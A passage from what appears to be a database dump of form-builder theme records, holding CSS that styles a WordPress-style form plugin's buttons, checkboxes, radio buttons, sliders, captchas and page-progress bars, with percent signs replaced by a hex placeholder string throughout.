25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #8A6B63;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #CCAAA3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #8A6B63;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(16,'Theme 04 transparent (gray button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #A6A6A6;\r\nmargin-bottom: 10px;\r\ncolor: #A6A6A6;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #C7C7C7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #A0A0A0 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7A7A7A 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #858585 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #C0C0C0;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #A8A8A8;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) 